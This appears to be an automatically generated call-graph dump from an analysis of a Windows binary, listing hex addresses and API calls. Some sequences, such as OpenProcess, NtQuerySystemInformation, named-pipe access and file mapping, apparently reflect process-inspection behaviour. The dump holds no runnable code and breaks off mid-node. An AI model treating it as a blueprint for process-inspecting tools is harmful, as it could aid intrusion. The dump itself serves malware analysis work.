3683->3681 3684 f64fb3 __amsg_exit 65 API calls 3683->3684 3685 f6613e 3684->3685 3685->3681 3865 f6603e LeaveCriticalSection 3686->3865 3688 f6467a 3688->3633 3690 f64278 InterlockedIncrement 3689->3690 3691 f6427b 3689->3691 3690->3691 3692 f64288 3691->3692 3693 f64285 InterlockedIncrement 3691->3693 3694 f64295 3692->3694 3695 f64292 InterlockedIncrement 3692->3695 3693->3692 3696 f6429f InterlockedIncrement 3694->3696 3697 f642a2 3694->3697 3695->3694 3696->3697 3698 f642bb InterlockedIncrement 3697->3698 3699 f642cb InterlockedIncrement 3697->3699 3700 f642d6 InterlockedIncrement 3697->3700 3698->3697 3699->3697 3700->3636 3866 f6603e LeaveCriticalSection 3701->3866 3703 f646c8 3703->3638 3705 f66061 __CxxUnhandledExceptionFilter 3704->3705 3706 f66087 3705->3706 3729 f651a6 3705->3729 3712 f66097 __CxxUnhandledExceptionFilter 3706->3712 3765 f66184 3706->3765 3710 f660a2 3713 f660a9 3710->3713 3714 f660b8 3710->3714 3712->3683 3718 f64c83 __wcsicoll 65 API calls 3713->3718 3717 f66117 ___crtLCMapStringA 65 API calls 3714->3717 3715 f6607d 3762 f64d11 3715->3762 3719 f660bf 3717->3719 3718->3712 3720 f660c7 InitializeCriticalSectionAndSpinCount 3719->3720 3721 f660f2 3719->3721 3723 f660d7 3720->3723 3728 f660e3 3720->3728 3722 f6614a __freea 65 API calls 3721->3722 3722->3728 3724 f6614a __freea 65 API calls 3723->3724 3726 f660dd 3724->3726 3727 f64c83 __wcsicoll 65 API calls 3726->3727 3727->3728 3770 f6610e 3728->3770 3773 f67578 3729->3773 3731 f651ad 3732 f67578 __amsg_exit 66 API calls 3731->3732 3734 f651ba 3731->3734 3732->3734 3733 f64ff7 __amsg_exit 66 API calls 3735 f651d2 3733->3735 3734->3733 3737 f651dc 3734->3737 3736 f64ff7 __amsg_exit 66 API calls 3735->3736 3736->3737 3738 f64ff7 3737->3738 3739 f65018 __amsg_exit 3738->3739 3740 f65134 3739->3740 3741 f67578 __amsg_exit 63 API calls 3739->3741 3834 f65f8e 3740->3834 3743 f65032 3741->3743 3745 f65143 GetStdHandle 3743->3745 3746 f67578 __amsg_exit 63 API calls 3743->3746 3744 f651a4 3744->3715 3745->3740 3750 f65151 _strlen 3745->3750 3747 f65043 3746->3747 3747->3745 3748 f65055 3747->3748 3748->3740 3798 f67515 3748->3798 3750->3740 3752 f65187 WriteFile 3750->3752 3752->3740 3753 f65081 GetModuleFileNameW 3754 f650a2 3753->3754 3759 f650ae _wcslen 3753->3759 3756 f67515 __amsg_exit 63 API calls 3754->3756 3755 f64bdf __amsg_exit 10 API calls 3755->3759 3756->3759 3758 f673b8 63 API calls __amsg_exit 3758->3759 3759->3755 3759->3758 3760 f65124 3759->3760 3807 f6742d 3759->3807 3816 f6724c 3760->3816 3844 f64ce6 GetModuleHandleW 3762->3844 3769 f6618d 3765->3769 3767 f661c3 3767->3710 3768 f661a4 Sleep 3768->3769 3769->3767 3769->3768 3848 f677dc 3769->3848 3864 f6603e LeaveCriticalSection 3770->3864 3772 f66115 3772->3712 3774 f67584 3773->3774 3775 f64c83 __wcsicoll 66 API calls 3774->3775 3776 f6758e 3774->3776 3777 f675a7 3775->3777 3776->3731 3780 f64c31 3777->3780 3783 f64c04 DecodePointer 3780->3783 3784 f64c19 3783->3784 3789 f64bdf 3784->3789 3786 f64c30 3787 f64c04 __wcsicoll 10 API calls 3786->3787 3788 f64c3d 3787->3788 3788->3731 3792 f64ab6 3789->3792 3793 f64ad5 setSBUpLow 3792->3793 3794 f64af3 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 3793->3794 3796 f64bc1 setSBUpLow 3794->3796 3795 f65f8e setSBUpLow 5 API calls 3797 f64bdd GetCurrentProcess TerminateProcess 3795->3797 3796->3795 3797->3786 3799 f67523 3798->3799 3801 f6752a 3798->3801 3799->3801 3805 f6754b 3799->3805 3800 f64c83 __wcsicoll 66 API calls 3802 f6752f 3800->3802 3801->3800 3803 f64c31 __wcsicoll 11 API calls 3802->3803 3804 f65076 3803->3804 3804->3753 3804->3759 3805->3804 3806 f64c83 __wcsicoll 66 API calls 3805->3806 3806->3802 3812 f6743f 3807->3812 3808 f67443 3809 f67448 3808->3809 3810 f64c83 __wcsicoll 66 API calls 3808->3810 3809->3759 3811 f6745f 3810->3811 3813 f64c31 __wcsicoll 11 API calls 3811->3813 3812->3808 3812->3809 3814 f67486 3812->3814 3813->3809 3814->3809 3815 f64c83 __wcsicoll 66 API calls 3814->3815 3815->3811 3842 f64593 EncodePointer 3816->3842 3818 f67272 3819 f672ff 3818->3819 3820 f67282 LoadLibraryW 3818->3820 3826 f67319 DecodePointer DecodePointer 3819->3826 3827 f6732c 3819->3827 3821 f67397 3820->3821 3822 f67297 GetProcAddress 3820->3822 3829 f65f8e setSBUpLow 5 API calls 3821->3829 3822->3821 3825 f672ad 7 API calls 3822->3825 3823 f67362 DecodePointer 3824 f6738b DecodePointer 3823->3824 3828 f67369 3823->3828 3824->3821 3825->3819 3830 f672ef GetProcAddress EncodePointer 3825->3830 3826->3827 3827->3823 3827->3824 3833 f6734f 3827->3833 3828->3824 3832 f6737c DecodePointer 3828->3832 3831 f673b6 3829->3831 3830->3819 3831->3740 3832->3824 3832->3833 3833->3824 3835 f65f96 3834->3835 3836 f65f98 IsDebuggerPresent 3834->3836 3835->3744 3843 f667c5 3836->3843 3839 f67969 SetUnhandledExceptionFilter UnhandledExceptionFilter 3840 f6798e GetCurrentProcess TerminateProcess 3839->3840 3841 f67986 setSBUpLow 3839->3841 3840->3744 3841->3840 3842->3818 3843->3839 3845 f64d0f ExitProcess 3844->3845 3846 f64cfa GetProcAddress 3844->3846 3846->3845 3847 f64d0a 3846->3847 3847->3845 3849 f67859 3848->3849 3858 f677ea 3848->3858 3850 f66f6c ___crtLCMapStringA DecodePointer 3849->3850 3851 f6785f 3850->3851 3853 f64c83 __wcsicoll 65 API calls 3851->3853 3852 f651a6 __amsg_exit 65 API calls 3852->3858 3854 f67851 3853->3854 3854->3769 3855 f67818 HeapAlloc 3855->3854 3855->3858 3856 f64ff7 __amsg_exit 65 API calls 3856->3858 3857 f67845 3860 f64c83 __wcsicoll 65 API calls 3857->3860 3858->3852 3858->3855 3858->3856 3858->3857 3859 f64d11 __amsg_exit 3 API calls 3858->3859 3861 f66f6c ___crtLCMapStringA DecodePointer 3858->3861 3862 f67843 3858->3862 3859->3858 3860->3862 3861->3858 3863 f64c83 __wcsicoll 65 API calls 3862->3863 3863->3854 3864->3772 3865->3688 3866->3703 3868 f670d4 EncodePointer 3867->3868 3868->3868 3869 f670ee 3868->3869 3869->3567 3873 f6707b 3870->3873 3872 f670c4 3872->3569 3874 f67087 __CxxUnhandledExceptionFilter 3873->3874 3881 f64d29 3874->3881 3880 f670a8 __CxxUnhandledExceptionFilter 3880->3872 3882 f66117 ___crtLCMapStringA 66 API calls 3881->3882 3883 f64d30 3882->3883 3884 f66f94 DecodePointer DecodePointer 3883->3884 3885 f66fc2 3884->3885 3886 f67043 3884->3886 3885->3886 3900 f67c27 3885->3900 3897 f670b1 3886->3897 3888 f66fd4 3889 f67026 EncodePointer EncodePointer 3888->3889 3890 f66fef 3888->3890 3891 f66ffe 3888->3891 3889->3886 3907 f66215 3890->3907 3891->3886 3893 f66ff8 3891->3893 3893->3891 3894 f66215 70 API calls 3893->3894 3896 f67014 EncodePointer 3893->3896 3895 f6700e 3894->3895 3895->3886 3895->3896 3896->3889 3933 f64d32 3897->3933 3901 f67c32 3900->3901 3902 f67c47 HeapSize 3900->3902 3903 f64c83 __wcsicoll 66 API calls 3901->3903 3902->3888 3904 f67c37 3903->3904 3905 f64c31 __wcsicoll 11 API calls 3904->3905 3906 f67c42 3905->3906 3906->3888 3911 f6621e 3907->3911 3909 f6625d 3909->3893 3910 f6623e Sleep 3910->3911 3911->3909 3911->3910 3912 f67a24 3911->3912 3913 f67a2f 3912->3913 3914 f67a3a 3912->3914 3915 f677dc ___crtLCMapStringA 66 API calls 3913->3915 3916 f67a42 3914->3916 3917 f67a4f 3914->3917 3919 f67a37 3915->3919 3918 f6614a __freea 66 API calls 3916->3918 3920 f67a87 3917->3920 3921 f67a57 HeapReAlloc 3917->3921 3924 f67ab7 3917->3924 3927 f66f6c ___crtLCMapStringA DecodePointer 3917->3927 3929 f67a9f 3917->3929 3930 f67a4a __freea 3918->3930 3919->3911 3922 f66f6c ___crtLCMapStringA DecodePointer 3920->3922 3921->3917 3921->3930 3923 f67a8d 3922->3923 3925 f64c83 __wcsicoll 66 API calls 3923->3925 3926 f64c83 __wcsicoll 66 API calls 3924->3926 3925->3930 3928 f67abc GetLastError 3926->3928 3927->3917 3928->3930 3931 f64c83 __wcsicoll 66 API calls 3929->3931 3930->3911 3932 f67aa4 GetLastError 3931->3932 3932->3930 3936 f6603e LeaveCriticalSection 3933->3936 3935 f64d39 3935->3880 3936->3935 3949 f62e19 3937->3949 3941 f6202c InitializeSecurityDescriptor 3940->3941 3945 f620ad 3940->3945 3942 f62039 SetSecurityDescriptorDacl 3941->3942 3941->3945 3942->3945 3948 f6204b 3942->3948 3943 f62051 CreateFileW 3944 f62072 GetModuleHandleW GetProcAddress 3943->3944 3943->3945 3944->3948 3945->3572 3946 f6209b WaitNamedPipeW 3946->3945 3946->3948 3947 f62093 Sleep 3947->3948 3948->3943 3948->3945 3948->3946 3948->3947 3965 f62b7d 3949->3965 3952 f6315d 3952->3573 3953 f61149 10 API calls 3955 f62efd 3953->3955 3954 f62f14 GetModuleHandleW GetProcAddress 3954->3955 3955->3952 3955->3954 3956 f6313c LocalFree 3955->3956 3957 f61efa 12 API calls 3955->3957 3958 f61149 10 API calls 3955->3958 3959 f63090 GetModuleHandleW GetProcAddress 3955->3959 3961 f630f9 LocalFree 3955->3961 3962 f63107 LocalFree 3955->3962 3963 f63118 LocalFree 3955->3963 3964 f63122 LocalFree 3955->3964 3986 f63285 3955->3986 3956->3955 3957->3955 3958->3955 3959->3955 3961->3955 3962->3955 3963->3955 3964->3955 3966 f62dba 3965->3966 3967 f62bb6 3965->3967 3966->3952 3966->3953 3966->3955 3967->3966 3968 f62bd6 CreateFileW 3967->3968 3969 f62bf0 3967->3969 3971 f62c15 3968->3971 4019 f61982 RtlInitUnicodeString 3969->4019 3972 f62da0 3971->3972 4025 f61041 GetModuleHandleW GetProcAddress 3971->4025 4043 f6110e 3972->4043 3975 f62c06 OpenProcess 3975->3971 3976 f62dab CloseHandle 3976->3966 3978 f62c36 3978->3972 3979 f62cb1 GetCurrentProcess IsWow64Process 3978->3979 3981 f62c45 3978->3981 3979->3981 3980 f62cf1 3980->3972 3980->3981 3992 f619ee 3980->3992 3981->3972 3981->3980 3985 f62c8a 3981->3985 3985->3966 3985->3972 4103 f631ab GetComputerNameW 3986->4103 3988 f6328e 3989 f632dc 3988->3989 4115 f63640 3988->4115 4128 f63642 3988->4128 3989->3955 3993 f61c9e 3992->3993 3994 f61a2c 3992->3994 3995 f61d5f 13 API calls 3993->3995 3996 f61a33 3994->3996 3997 f61b8e 3994->3997 4004 f61ca8 3995->4004 3999 f61a3a 3996->3999 4013 f61afc _wcsrchr 3996->4013 4057 f61d5f 3997->4057 4000 f61a3d 3999->4000 4050 f618d9 3999->4050 4000->3972 4035 f634d4 4000->4035 4003 f61149 10 API calls 4016 f61bc4 4003->4016 4004->4000 4005 f61cfa 17 API calls 4004->4005 4005->4004 4006 f61a53 4006->4000 4009 f61ab2 4006->4009 4007 f61149 10 API calls 4007->4016 4008 f61b53 RtlInitUnicodeString 4010 f61cfa 17 API calls 4008->4010 4009->4006 4014 f61ac1 RtlInitUnicodeString 4009->4014 4071 f61fa9 4009->4071 4010->4013 4011 f61c11 GetModuleHandleW GetProcAddress 4011->4016 4013->4000 4013->4008 4015 f61ada LocalFree 4014->4015 4015->4009 4016->4000 4016->4007 4016->4011 4017 f61c85 LocalFree 4016->4017 4066 f61cfa 4016->4066 4017->4016 4020 f618d9 5 API calls 4019->4020 4021 f619b7 4020->4021 4022 f619e8 4021->4022 4024 f619dc LocalFree 4021->4024 4089 f6194b RtlEqualUnicodeString 4021->4089 4022->3972 4022->3975 4024->4022 4026 f6106b 4025->4026 4027 f61090 GetModuleHandleW GetProcAddress 4026->4027 4029 f610bf GetModuleHandleW GetProcAddress 4026->4029 4030 f61088 4026->4030 4031 f610a1 4026->4031 4032 f610aa 4026->4032 4027->4031 4028 f610fd LocalFree 4028->4032 4033 f610d0 4029->4033 4030->4027 4030->4028 4031->4028 4031->4032 4032->3978 4033->4028 4091 f61487 GetModuleHandleW GetProcAddress 4033->4091 4036 f6350f 4035->4036 4037 f6134e 13 API calls 4036->4037 4042 f63588 4036->4042 4038 f6352f 4037->4038 4039 f61149 10 API calls 4038->4039 4038->4042 4040 f63560 4039->4040 4041 f61149 10 API calls 4040->4041 4040->4042 4041->4042 4042->3985 4044 f61146 4043->4044 4045 f61112 4043->4045 4044->3976 4047 f6112e LocalFree 4045->4047 4048 f61503 2 API calls 4045->4048 4049 f61121 4045->4049 4046 f6112c LocalFree 4046->4047 4047->3976 4048->4049 4049->4046 4049->4047 4051 f618f8 4050->4051 4052 f618e5 NtQuerySystemInformation 4050->4052 4053 f61946 4051->4053 4054 f618fe GetModuleHandleW GetProcAddress 4051->4054 4055 f61920 NtQuerySystemInformation 4051->4055 4052->4053 4053->4006 4054->4051 4055->4051 4056 f61934 LocalFree 4055->4056 4056->4051 4058 f61d7b GetCurrentProcess 4057->4058 4059 f61d74 4057->4059 4058->4059 4060 f61d99 4059->4060 4061 f61dde RtlGetCurrentPeb 4059->4061 4062 f61b9e 4060->4062 4063 f61d9c NtQueryInformationProcess 4060->4063 4061->4062 4062->4000 4062->4003 4063->4062 4064 f61db2 4063->4064 4064->4062 4065 f61149 10 API calls 4064->4065 4065->4062 4075 f61df3 4066->4075 4069 f61d0f LocalFree 4069->4016 4070 f61d21 4070->4016 4072 f61faf 4071->4072 4074 f61fd3 4071->4074 4073 f61fb3 GetModuleHandleW GetProcAddress 4072->4073 4072->4074 4073->4074 4074->4009 4074->4074 4076 f61149 10 API calls 4075->4076 4078 f61e2c 4076->4078 4077 f61d0a 4077->4069 4077->4070 4078->4077 4079 f61e46 GetModuleHandleW GetProcAddress 4078->4079 4080 f61e70 4079->4080 4080->4077 4081 f61149 10 API calls 4080->4081 4082 f61e86 GetModuleHandleW GetProcAddress 4081->4082 4083 f61eb7 4082->4083 4084 f61eed LocalFree 4083->4084 4085 f61149 10 API calls 4083->4085 4084->4077 4086 f61ed4 4085->4086 4087 f61ede 4086->4087 4088 f61ee8 LocalFree 4086->4088 4087->4084 4088->4084 4090 f6196d 4089->4090 4090->4021 4092 f614a7 4091->4092 4093 f614ad CreateFileMappingW 4092->4093 4097 f614f5 4092->4097 4094 f614c7 MapViewOfFile 4093->4094 4096 f614dd 4093->4096 4094->4096 4096->4097 4098 f61503 4096->4098 4097->4031 4099 f6150d UnmapViewOfFile 4098->4099 4100 f61514 4098->4100 4099->4100 4101 f6151a CloseHandle 4100->4101 4102 f61521 4100->4102 4101->4102 4102->4097 4104 f631e2 4103->4104 4112 f6320e 4103->4112 4141 f63168 4104->4141 4107 f6327d 4107->3988 4108 f631f0 StrCmpIW 4110 f63202 4108->4110 4111 f63205 LocalFree 4108->4111 4109 f63168 2 API calls 4113 f6323c _wcschr 4109->4113 4110->4111 4111->4107 4111->4112 4112->4107 4112->4109 4113->4107 4114 f6327a LocalFree 4113->4114 4114->4107 4116 f63642 4115->4116 4117 f634d4 13 API calls 4116->4117 4119 f6368f 4116->4119 4117->4119 4121 f6370f 4119->4121 4145 f63594 GetModuleHandleW GetProcAddress 4119->4145 4121->3988 4122 f636bc GetModuleHandleW GetProcAddress 4123 f636d8 4122->4123 4123->4121 4124 f61149 10 API calls 4123->4124 4125 f636ee 4124->4125 4126 f63705 LocalFree 4125->4126 4153 f63303 4125->4153 4126->4121 4129 f6368f 4128->4129 4130 f63673 4128->4130 4132 f63594 13 API calls 4129->4132 4134 f6370f 4129->4134 4131 f634d4 13 API calls 4130->4131 4131->4129 4133 f636b4 4132->4133 4133->4134 4135 f636bc GetModuleHandleW GetProcAddress 4133->4135 4134->3988 4136 f636d8 4135->4136 4136->4134 4137 f61149 10 API calls 4136->4137 4138 f636ee 4137->4138 4139 f63705 LocalFree 4138->4139 4140 f63303 26 API calls 4138->4140 4139->4134 4140->4139 4142 f631a7 4141->4142 4143 f6316f GetModuleHandleW GetProcAddress 4141->4143 4142->4108 4142->4112 4144 f63191 4143->4144 4144->4142 4147 f635ce 4145->4147 4146 f6363a 4146->4121 4146->4122 4147->4146 4148 f61149 10 API calls 4147->4148 4152 f635e1 4148->4152 4149 f63629 LocalFree 4149->4146 4151 f61149 10 API calls 4151->4152 4152->4149 4152->4151 4154 f63324 4153->4154 4156 f634cf 4154->4156 4192 f61efa 4154->4192 4156->4126 4159 f61efa 12 API calls 4160 f6335d 4159->4160 4163 f61f6d 2 API calls 4160->4163 4164 f63366 4160->4164 4161 f63348 4161->4159 4162 f61efa 12 API calls 4168 f6337b 4162->4168 4163->4164 4164->4162 4165 f6349f 4166 f634a6 LocalFree 4165->4166 4167 f634af 4165->4167 4166->4167 4169 f634b6 LocalFree 4167->4169 4170 f634bf 4167->4170 4168->4165 4171 f61f6d 2 API calls 4168->4171 4169->4170 4170->4156 4172 f634c6 LocalFree 4170->4172 4173 f6339a 4171->4173 4172->4156 4173->4165 4174 f63168 2 API calls 4173->4174 4175 f633b5 4174->4175 4176 f63168 2 API calls 4175->4176 4177 f633bf 4176->4177 4178 f63168 2 API calls 4177->4178 4179 f633ca 4178->4179 4180 f633d5 StrChrW 4179->4180 4181 f633e9 wsprintfW 4179->4181 4180->4181 4183 f63435 4181->4183 4183->4183 4184 f63440 GetModuleHandleW GetProcAddress 4183->4184 4185 f63476 4184->4185 4186 f6347a LocalFree 4185->4186 4187 f63481 4185->4187 4186->4187 4188 f63486 LocalFree 4187->4188 4189 f6348f 4187->4189 4188->4189 4190 f63494 LocalFree 4189->4190 4191 f6349d 4189->4191 4190->4191 4191->4165 4193 f61f22 4192->4193 4197 f61f63 4192->4197 4194 f61f2b GetModuleHandleW GetProcAddress 4193->4194 4193->4197 4195 f61f47 4194->4195 4196 f61149 10 API calls 4195->4196 4195->4197 4196->4197 4197->4161 4198 f61f6d 4197->4198 4199 f61f7c IsCharAlphaNumericW 4198->4199 4200 f61f8d IsTextUnicode 4198->4200 4199->4200 4201 f61fa2 4199->4201 4200->4201 4201->4161 4203 f64e35 __CxxUnhandledExceptionFilter 4202->4203 4204 f66117 ___crtLCMapStringA 61 API calls 4203->4204 4205 f64e3c 4204->4205 4206 f64e67 DecodePointer 4205->4206 4214 f64ee6 4205->4214 4208 f64e7e DecodePointer 4206->4208 4206->4214 4210 f64e91 4208->4210 4210->4214 4219 f64ea8 DecodePointer 4210->4219 4222 f64eb7 DecodePointer DecodePointer 4210->4222 4223 f64593 EncodePointer 4210->4223 4212 f64f63 __CxxUnhandledExceptionFilter 4212->3582 4225 f64f54 4214->4225 4215 f64f4b 4216 f64d11 __amsg_exit 3 API calls 4215->4216 4217 f64f54 4215->4217 4216->4217 4218 f64f61 4217->4218 4230 f6603e LeaveCriticalSection 4217->4230 4218->3582 4224 f64593 EncodePointer 4219->4224 4222->4210 4223->4210 4224->4210 4226 f64f5a 4225->4226 4227 f64f34 4225->4227 4231 f6603e LeaveCriticalSection 4226->4231 4227->4212 4229 f6603e LeaveCriticalSection 4227->4229 4229->4215 4230->4218 4231->4227 4233 f64e29 __amsg_exit 66 API calls 4232->4233 4234 f64f90 4233->4234 4267 f623e1 4268 f62440 4267->4268 4269 f6134e 13 API calls 4268->4269 4270 f6246e 4269->4270 4271 f61149 10 API calls 4270->4271 4278 f624fa 4270->4278 4272 f62496 4271->4272 4273 f61149 10 API calls 4272->4273 4272->4278 4274 f624b7 4273->4274 4274->4278 4279 f62510 4274->4279 4277 f62510 10 API calls 4277->4278 4280 f61149 10 API calls 4279->4280 4281 f6252f 4280->4281 4282 f624db 4281->4282 4283 f61149 10 API calls 4281->4283 4282->4277 4282->4278 4284 f62542 4283->4284 4284->4282 4285 f61149 10 API calls 4284->4285 4285->4282 4286 f66d14 4287 f66d17 4286->4287 4290 f67bf4 4287->4290 4299 f66d8f DecodePointer 4290->4299 4292 f67bf9 4293 f67c04 4292->4293 4300 f66d9c 4292->4300 4295 f67c1c 4293->4295 4296 f64ab6 __CxxUnhandledExceptionFilter 8 API calls 4293->4296 4297 f64f7f __amsg_exit 66 API calls 4295->4297 4296->4295 4298 f67c26 4297->4298 4299->4292 4306 f66da8 __CxxUnhandledExceptionFilter 4300->4306 4301 f66dcf 4302 f646ca __XcptFilter 66 API calls 4301->4302 4305 f66dd4 _siglookup 4302->4305 4304 f66e03 4307 f66de5 DecodePointer 4304->4307 4308 f66e12 4304->4308 4309 f66ddd __CxxUnhandledExceptionFilter 4305->4309 4314 f66e6f 4305->4314 4315 f64f7f __amsg_exit 66 API calls 4305->4315 4306->4301 4306->4304 4306->4307 4310 f66dcb 4306->4310 4307->4305 4311 f64c83 __wcsicoll 66 API calls 4308->4311 4309->4293 4310->4301 4310->4308 4312 f66e17 4311->4312 4313 f64c31 __wcsicoll 11 API calls 4312->4313 4313->4309 4316 f66117 ___crtLCMapStringA 66 API calls 4314->4316 4317 f66e7a 4314->4317 4315->4314 4316->4317 4319 f66eaf 4317->4319 4321 f64593 EncodePointer 4317->4321 4322 f66f03 4319->4322 4321->4319 4323 f66f09 4322->4323 4325 f66f10 4322->4325 4326 f6603e LeaveCriticalSection 4323->4326 4325->4309 4326->4325 4851 f677cc IsProcessorFeaturePresent 4331 f64203 4334 f6603e LeaveCriticalSection 4331->4334 4333 f6420a 4334->4333 4335 f6475d 4336 f64769 __CxxUnhandledExceptionFilter 4335->4336 4337 f64781 4336->4337 4338 f6486b __CxxUnhandledExceptionFilter 4336->4338 4339 f6614a __freea 66 API calls 4336->4339 4340 f6478f 4337->4340 4341 f6614a __freea 66 API calls 4337->4341 4339->4337 4342 f6479d 4340->4342 4343 f6614a __freea 66 API calls 4340->4343 4341->4340 4344 f6614a __freea 66 API calls 4342->4344 4345 f647ab 4342->4345 4343->4342 4344->4345 4346 f6614a __freea 66 API calls 4345->4346 4347 f647b9 4345->4347 4346->4347 4348 f647c7 4347->4348 4349 f6614a __freea 66 API calls 4347->4349 4350 f647d5 4348->4350 4351 f6614a __freea 66 API calls 4348->4351 4349->4348 4353 f6614a __freea 66 API calls 4350->4353 4355 f647e6 4350->4355 4351->4350 4352 f66117 ___crtLCMapStringA 66 API calls 4354 f647ee 4352->4354 4353->4355 4356 f64813 4354->4356 4357 f647fa InterlockedDecrement 4354->4357 4355->4352 4371 f64877 4356->4371 4357->4356 4360 f64805 4357->4360 4360->4356 4362 f6614a __freea 66 API calls 4360->4362 4361 f66117 ___crtLCMapStringA 66 API calls 4363 f64827 4361->4363 4362->4356 4370 f64858 4363->4370 4374 f642e9 4363->4374 4368 f6614a __freea 66 API calls 4368->4338 4418 f64883 4370->4418 4421 f6603e LeaveCriticalSection 4371->4421 4373 f64820 4373->4361 4375 f642fa InterlockedDecrement 4374->4375 4376 f6437d 4374->4376 4377 f64312 4375->4377 4378 f6430f InterlockedDecrement 4375->4378 4376->4370 4388 f64382 4376->4388 4379 f6431c InterlockedDecrement 4377->4379 4380 f6431f 4377->4380 4378->4377 4379->4380 4381 f6432c 4380->4381 4382 f64329 InterlockedDecrement 4380->4382 4383 f64336 InterlockedDecrement 4381->4383 4384 f64339 4381->4384 4382->4381 4383->4384 4385 f64352 InterlockedDecrement 4384->4385 4386 f64362 InterlockedDecrement 4384->4386 4387 f6436d InterlockedDecrement 4384->4387 4385->4384 4386->4384 4387->4376 4389 f64399 4388->4389 4390 f64406 4388->4390 4389->4390 4400 f643cd 4389->4400 4402 f6614a __freea 66 API calls 4389->4402 4391 f6614a __freea 66 API calls 4390->4391 4392 f64453 4390->4392 4394 f64427 4391->4394 4405 f6447c 4392->4405 4462 f66263 4392->4462 4396 f6614a __freea 66 API calls 4394->4396 4401 f6443a 4396->4401 4397 f644c1 4404 f6614a __freea 66 API calls 4397->4404 4398 f6614a __freea 66 API calls 4403 f643fb 4398->4403 4399 f6614a __freea 66 API calls 4399->4405 4406 f6614a __freea 66 API calls 4400->4406 4417 f643ee 4400->4417 4407 f6614a __freea 66 API calls 4401->4407 4409 f643c2 4402->4409 4410 f6614a __freea 66 API calls 4403->4410 4412 f644c7 4404->4412 4405->4397 4408 f6614a 66 API calls __freea 4405->4408 4411 f643e3 4406->4411 4414 f64448 4407->4414 4408->4405 4422 f66643 4409->4422 4410->4390 4450 f665da 4411->4450 4412->4370 4416 f6614a __freea 66 API calls 4414->4416 4416->4392 4417->4398 4636 f6603e LeaveCriticalSection 4418->4636 4420 f64865 4420->4368 4421->4373 4423 f66654 4422->4423 4449 f6673d 4422->4449 4424 f66665 4423->4424 4425 f6614a __freea 66 API calls 4423->4425 4426 f66677 4424->4426 4427 f6614a __freea 66 API calls 4424->4427 4425->4424 4428 f66689 4426->4428 4430 f6614a __freea 66 API calls 4426->4430 4427->4426 4429 f6669b 4428->4429 4431 f6614a __freea 66 API calls 4428->4431 4432 f6614a __freea 66 API calls 4429->4432 4433 f666ad 4429->4433 4430->4428 4431->4429 4432->4433 4434 f6614a __freea 66 API calls 4433->4434 4437 f666bf 4433->4437 4434->4437 4435 f666e3 4440 f666f5 4435->4440 4441 f6614a __freea 66 API calls 4435->4441 4436 f666d1 4436->4435 4439 f6614a __freea 66 API calls 4436->4439 4437->4436 4438 f6614a __freea 66 API calls 4437->4438 4438->4436 4439->4435 4442 f66707 4440->4442 4443 f6614a __freea 66 API calls 4440->4443 4441->4440 4445 f66719 4442->4445 4446 f6614a __freea 66 API calls 4442->4446 4443->4442 4444 f6672b 4448 f6614a __freea 66 API calls 4444->4448 4444->4449 4445->4444 4447 f6614a __freea 66 API calls 4445->4447 4446->4445 4447->4444 4448->4449 4449->4400 4451 f6663f 4450->4451 4452 f665e7 4450->4452 4451->4417 4453 f6614a __freea 66 API calls 4452->4453 4455 f665f7 4452->4455 4453->4455 4454 f66609 4456 f6661b 4454->4456 4458 f6614a __freea 66 API calls 4454->4458 4455->4454 4457 f6614a __freea 66 API calls 4455->4457 4459 f6662d 4456->4459 4460 f6614a __freea 66 API calls 4456->4460 4457->4454 4458->4456 4459->4451 4461 f6614a __freea 66 API calls 4459->4461 4460->4459 4461->4451 4463 f66274 4462->4463 4635 f64471 4462->4635 4464 f6614a __freea 66 API calls 4463->4464 4465 f6627c 4464->4465 4466 f6614a __freea 66 API calls 4465->4466 4467 f66284 4466->4467 4468 f6614a __freea 66 API calls 4467->4468 4469 f6628c 4468->4469 4470 f6614a __freea 66 API calls 4469->4470 4471 f66294 4470->4471 4472 f6614a __freea 66 API calls 4471->4472 4473 f6629c 4472->4473 4474 f6614a __freea 66 API calls 4473->4474 4475 f662a4 4474->4475 4476 f6614a __freea 66 API calls 4475->4476 4477 f662ab 4476->4477 4478 f6614a __freea 66 API calls 4477->4478 4479 f662b3 4478->4479 4480 f6614a __freea 66 API calls 4479->4480 4481 f662bb 4480->4481 4482 f6614a __freea 66 API calls 4481->4482 4483 f662c3 4482->4483 4484 f6614a __freea 66 API calls 4483->4484 4485 f662cb 4484->4485 4486 f6614a __freea 66 API calls 4485->4486 4487 f662d3 4486->4487 4488 f6614a __freea 66 API calls 4487->4488 4489 f662db 4488->4489 4490 f6614a __freea 66 API calls 4489->4490 4491 f662e3 4490->4491 4492 f6614a __freea 66 API calls 4491->4492 4493 f662eb 4492->4493 4494 f6614a __freea 66 API calls 4493->4494 4495 f662f3 4494->4495 4496 f6614a __freea 66 API calls 4495->4496 4497 f662fe 4496->4497 4498 f6614a __freea 66 API calls 4497->4498 4499 f66306 4498->4499 4500 f6614a __freea 66 API calls 4499->4500 4501 f6630e 4500->4501 4502 f6614a __freea 66 API calls 4501->4502 4503 f66316 4502->4503 4504 f6614a __freea 66 API calls 4503->4504 4505 f6631e 4504->4505 4506 f6614a __freea 66 API calls 4505->4506 4507 f66326 4506->4507 4508 f6614a __freea 66 API calls 4507->4508 4509 f6632e 4508->4509 4510 f6614a __freea 66 API calls 4509->4510 4511 f66336 4510->4511 4512 f6614a __freea 66 API calls 4511->4512 4513 f6633e 4512->4513 4514 f6614a __freea 66 API calls 4513->4514 4515 f66346 4514->4515 4516 f6614a __freea 66 API calls 4515->4516 4517 f6634e 4516->4517 4518 f6614a __freea 66 API calls 4517->4518 4519 f66356 4518->4519 4520 f6614a __freea 66 API calls 4519->4520 4521 f6635e 4520->4521 4522 f6614a __freea 66 API calls 4521->4522 4523 f66366 4522->4523 4524 f6614a __freea 66 API calls 4523->4524 4525 f6636e 4524->4525 4526 f6614a __freea 66 API calls 4525->4526 4527 f66376 4526->4527 4528 f6614a __freea 66 API calls 4527->4528 4529 f66384 4528->4529 4530 f6614a __freea 66 API calls 4529->4530 4531 f6638f 4530->4531 4532 f6614a __freea 66 API calls 4531->4532 4533 f6639a 4532->4533 4534 f6614a __freea 66 API calls 4533->4534 4535 f663a5 4534->4535 4536 f6614a __freea 66 API calls 4535->4536 4537 f663b0 4536->4537 4538 f6614a __freea 66 API calls 4537->4538 4539 f663bb 4538->4539 4540 f6614a __freea 66 API calls 4539->4540 4541 f663c6 4540->4541 4542 f6614a __freea 66 API calls 4541->4542 4543 f663d1 4542->4543 4544 f6614a __freea 66 API calls 4543->4544 4545 f663dc 4544->4545 4546 f6614a __freea 66 API calls 4545->4546 4547 f663e7 4546->4547 4548 f6614a __freea 66 API calls 4547->4548 4549 